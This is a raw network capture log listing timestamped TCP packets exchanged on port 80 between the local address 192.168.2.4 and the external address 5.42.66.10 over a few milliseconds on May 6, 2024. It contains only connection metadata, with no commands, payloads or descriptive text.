May 6, 2024 07:53:04.261409998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261420965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261436939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261450052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261466980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261481047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261493921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261503935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261518955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261531115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261550903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261559010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261570930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261571884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261581898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261594057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261595964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261606932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261614084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261619091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261624098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261650085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261663914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261756897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261769056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261779070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261791945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261795044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261804104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261812925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261816025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261827946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261838913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261841059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261852026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261863947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261864901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261876106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261887074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261888981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261902094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261904955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261909962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261912107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261924982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261940956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261962891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.261965990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261977911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.261990070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262001991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262002945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262013912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262025118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262029886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262057066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262063026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262084961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262096882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262106895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262118101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262124062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262129068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262140989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262141943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262152910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262164116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262167931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262176037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262181044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262190104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262202978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262209892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262214899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262227058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262228966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262239933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262245893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262269020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262306929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262320042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262331009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262341022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262341976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262353897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262367010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262367010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262378931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262391090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262394905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262403011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262413025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262418985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262423992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262435913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262447119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262449026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262458086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262465000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262484074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262485981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262511015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262511015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262518883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262548923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262561083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262571096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262583971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262586117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262594938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262598038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262607098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262618065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262619019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262629986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262639999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262644053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262650967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262653112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262665033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262676954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262682915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262689114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262701035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262708902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262712955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262717962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262723923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262738943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262747049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262758017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262767076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262775898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262788057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262792110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262799978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262813091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262814045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262823105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262835979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262837887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262849092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262860060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262862921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262872934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262880087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262885094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262902975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262917042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262927055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262931108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.262955904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.262976885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263034105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263045073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263056040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263068914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263073921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263079882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263087034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263092995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263104916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263108015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263117075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263130903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263145924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263148069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263159990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263170958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263181925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263184071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263192892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263205051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263211012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263216972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263228893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263235092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263241053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263248920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263262987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263272047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263277054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263286114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263288021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263304949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263310909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263319969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263322115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263331890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263333082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263345003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263350964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263358116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263364077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263389111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263436079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263448000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263458967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263469934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263477087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263482094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263493061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263494968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263504982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263516903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263518095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263530970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263539076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263541937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263555050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263556957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263567924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263577938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263578892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263592005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263602972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263606071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263611078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263614893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263626099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263636112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263638973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263652086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263659000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263676882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263700962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263709068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263721943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263731956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263744116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263746023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263756990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263757944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263768911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263773918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263781071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263782978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263792038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263802052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263804913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263818026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263828039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263839006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263859987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263864040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263871908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263883114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263895035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263895035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263906956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263909101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263921976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263926983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263931990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263932943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263947010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263955116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263968945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263973951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.263983965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263994932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.263997078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264008999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264025927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264031887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264054060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264066935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264080048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264090061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264091015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264108896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264117002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264117002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264122963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264122963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264146090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264147043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264158964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264166117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264173031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264178038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264184952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264194965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264205933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264206886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264219999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264219999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264231920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264242887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264244080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264256001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264259100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264267921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264272928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264280081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264286995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264292002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264301062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264307976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264321089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264323950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264337063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264338970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264358997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264384031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264408112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264420033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264429092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264440060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264451027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264453888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264458895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264467001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264478922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264484882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264492035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264502048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264508963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264513969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264524937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264532089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264537096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264548063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264549971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264561892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264561892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264573097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264585018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264585972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264597893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264610052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264611006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264621973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264622927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264646053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264653921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264658928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264671087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264673948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264683008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264693975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264695883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264707088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264718056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264730930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.264733076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264754057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.264770985 CEST	49741	80	192.168.2.4	5.42.66.10
